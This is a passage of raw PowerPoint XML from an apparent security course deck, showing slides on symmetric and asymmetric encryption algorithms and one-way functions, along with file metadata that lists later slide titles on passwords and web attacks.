            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1699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650" y="3788708"/>
            <a:ext cx="6991350" cy="287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18797227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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Symmetric Algorithms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="899299" name="Group 227"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="1295400"/>
          <a:ext cx="7772398" cy="5468391"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1413162"/>
                <a:gridCol w="1249603"/>
                <a:gridCol w="5109633"/>
              </a:tblGrid>
              <a:tr h="731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Symmetric Encryption Algorithm</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Key length</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(in bits)</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Description</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8961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DES</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56</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Designed at IBM during the 1970s and was the NIST standard until 1997.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Although considered outdated, DES remains widely in use.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Designed to be implemented only in hardware, and is therefore slower in software. </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7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3DES</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112 and 168</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Based on using DES three times which means that the input data is encrypted three times and therefore considered much stronger than DES.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However, it is rather slow compared to some new block ciphers such as AES. </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7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AES</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128, 192, and 256</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Fast in both software and hardware, is relatively easy to implement, and requires little memory.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As a new encryption standard, it is currently being deployed on a large scale. </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7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Software Encryption Algorithm (SEAL)</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160</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SEAL is an alternative algorithm to DES, 3DES, and AES.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It uses a 160-bit encryption key and has a lower impact to the CPU when compared to other software-based algorithms. </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56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The RC series</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="84790" marR="84790"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RC2 (40 and 64)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RC4 (up to256)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RC5 (up to 2040)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RC6 (128, 192, and 256)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="84790" marR="84790"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 set of symmetric-key encryption algorithms invented by Ron </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Rivest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-17145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RC1 was never published and RC3 was broken before ever being used. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-17145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RC4 is the world's most widely used stream cipher. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-17145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RC6, a 128-bit block cipher based heavily on RC5, was an AES finalist developed in 1997. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="84790" marR="84790"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180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dirty="0" smtClean="0"/>
              <a:t>Asymmetric Key Cryptosystems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82946" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"Public-Key" Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Slow! Public/private key pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Public keys widely distributed within digital certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Used as a secure channel for symmetric key exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Technical non-repudiation via digital signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1710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733800"/>
            <a:ext cx="70199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87029686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dirty="0" smtClean="0"/>
              <a:t>Asymmetric Key Cryptosystems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82946" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ElGamal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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667000"/>
            <a:ext cx="2159000" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5627298" y="6096000"/>
            <a:ext cx="2259849" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Taher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gamal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075112183"/>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Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mathematical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>operation that easily produces output values for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>each possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>combination of inputs but makes it impossible to retrieve the input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>been proven that any specific known function is truly one way. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Basis for Public key cryptosystems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Functions cryptographers suspect to be one way </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>theoretically possible that they might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>broken by future </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cryptanalysts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples: multiplication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> factorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3601468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fault Desig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Georgi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eorgia" pitchFamily="18" charset="0"/>
            <a:cs typeface="Arial" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:spDef>
    <a:lnDef>
      <a:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="1" cy="1"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst/>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="952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eorgia" pitchFamily="18"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0C9F628824264CB21996254EF5C83B" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8e41412d5fa06118641a8174ab8b784d">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="f894b662-64d7-49da-8371-1e7bea0bc874" xmlns:ns3="36860e64-a400-4035-9ebf-caf91c102eb6" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fcfe0edc099c3db4c53b2e2220fff8d3" ns2:_="" ns3:_="">
    <xsd:import namespace="f894b662-64d7-49da-8371-1e7bea0bc874"/>
    <xsd:import namespace="36860e64-a400-4035-9ebf-caf91c102e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4b662-64d7-49da-8371-1e7bea0bc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860e64-a400-4035-9ebf-caf91c102eb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72367e4-660f-4f26-8f83-db86b63f0c9f}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="36860e64-a400-4035-9ebf-caf91c102e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94b662-64d7-49da-8371-1e7bea0bc874">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="36860e64-a400-4035-9ebf-caf91c102eb6" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C9D5EF97-F532-4E34-80D8-5D277BA013BE}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9A93C1E0-78ED-4B7A-AA55-4889C98380A7}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{128F325E-379F-4831-A956-970938AEFA4E}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>4543</TotalTime>
  <Words>5212</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>959</Paragraphs>
  <Slides>152</Slides>
  <Notes>45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152</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="167" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Attacks and Vulnerabilities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Cryptography</vt:lpstr>
      <vt:lpstr>Cryptographic Services</vt:lpstr>
      <vt:lpstr>The Challenge that We Face </vt:lpstr>
      <vt:lpstr>Securing Communications</vt:lpstr>
      <vt:lpstr>Confidentiality</vt:lpstr>
      <vt:lpstr>Integrity</vt:lpstr>
      <vt:lpstr>Authentication</vt:lpstr>
      <vt:lpstr>Non-Repudiation</vt:lpstr>
      <vt:lpstr>Classification of the Field of Cryptology</vt:lpstr>
      <vt:lpstr>What is Cryptography?</vt:lpstr>
      <vt:lpstr>Beware of Overconfidence</vt:lpstr>
      <vt:lpstr>Some Basic Facts</vt:lpstr>
      <vt:lpstr>Cryptosystem</vt:lpstr>
      <vt:lpstr>Strength of the Cryptosystem</vt:lpstr>
      <vt:lpstr>Confidentiality and the OSI Model</vt:lpstr>
      <vt:lpstr>Criteria for Selecting an Encryption Algorithm</vt:lpstr>
      <vt:lpstr>Types of Cryptosystems</vt:lpstr>
      <vt:lpstr>Symmetric Key Cryptosystems</vt:lpstr>
      <vt:lpstr>Symmetric Algorithms</vt:lpstr>
      <vt:lpstr>Asymmetric Key Cryptosystems</vt:lpstr>
      <vt:lpstr>Asymmetric Key Cryptosystems</vt:lpstr>
      <vt:lpstr>One-Way Functions</vt:lpstr>
      <vt:lpstr>Hashing Algorithms</vt:lpstr>
      <vt:lpstr>Hashing Algorithms</vt:lpstr>
      <vt:lpstr>Applications of Cryptographic Hashes</vt:lpstr>
      <vt:lpstr>Hybrid Encryption Methods</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>Security Services- Digital Signatures</vt:lpstr>
      <vt:lpstr>Properties</vt:lpstr>
      <vt:lpstr>Code Signing with Digital Signatures</vt:lpstr>
      <vt:lpstr>Signing Messages with RSA</vt:lpstr>
      <vt:lpstr>Applying Cryptography</vt:lpstr>
      <vt:lpstr>Contents</vt:lpstr>
      <vt:lpstr>PKI Overview</vt:lpstr>
      <vt:lpstr>PKI Terminology</vt:lpstr>
      <vt:lpstr>CA Vendors and Sample Certificates</vt:lpstr>
      <vt:lpstr>X.509v3</vt:lpstr>
      <vt:lpstr>Basic Fields of X.509v3 Certificates</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr> Password Management</vt:lpstr>
      <vt:lpstr>Identification and Authentication Techniques</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Password Types </vt:lpstr>
      <vt:lpstr>Password Types</vt:lpstr>
      <vt:lpstr>Storing Passwords</vt:lpstr>
      <vt:lpstr>How Passwords is stored?</vt:lpstr>
      <vt:lpstr>How Windows Stores Passwords?</vt:lpstr>
      <vt:lpstr>Password Attacks</vt:lpstr>
      <vt:lpstr>Password Attacks</vt:lpstr>
      <vt:lpstr>Rainbow Tables</vt:lpstr>
      <vt:lpstr>Pre-computation Attacks</vt:lpstr>
      <vt:lpstr>How to increase password security?</vt:lpstr>
      <vt:lpstr>Tips on creating passwords</vt:lpstr>
      <vt:lpstr>Passwords Cracking Tools</vt:lpstr>
      <vt:lpstr>Biometrics</vt:lpstr>
      <vt:lpstr>Biometric Factor Ratings</vt:lpstr>
      <vt:lpstr>Biometrics Errors</vt:lpstr>
      <vt:lpstr>Biometric Device Sensitivity</vt:lpstr>
      <vt:lpstr>Tokens</vt:lpstr>
      <vt:lpstr>Token Types</vt:lpstr>
      <vt:lpstr>Time Synchronous One Time Password Example</vt:lpstr>
      <vt:lpstr>Token Drawbacks</vt:lpstr>
      <vt:lpstr> Web penetration attacks</vt:lpstr>
      <vt:lpstr>Software bugs</vt:lpstr>
      <vt:lpstr>Web applications attacks</vt:lpstr>
      <vt:lpstr>Web applications SQL injection attacks</vt:lpstr>
      <vt:lpstr>Web applications SQL injection attacks</vt:lpstr>
      <vt:lpstr>Web applications SQL injection attacks</vt:lpstr>
      <vt:lpstr>Mechanisms to protect web apps.</vt:lpstr>
      <vt:lpstr>Web attacks lab</vt:lpstr>
      <vt:lpstr>Web attacks lab</vt:lpstr>
      <vt:lpstr>Web attacks lab</vt:lpstr>
      <vt:lpstr>Web attacks lab</vt:lpstr>
      <vt:lpstr>Web attacks lab</vt:lpstr>
      <vt:lpstr>Web attacks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Islam</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <cp:revision>599</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-17T08:31:34Z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73</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="ContentTypeId">
    <vt:lpwstr>0x010100E70C9F628824264CB21996254EF5C83B</vt:lpwstr>
  </property>
</Properties>
</file>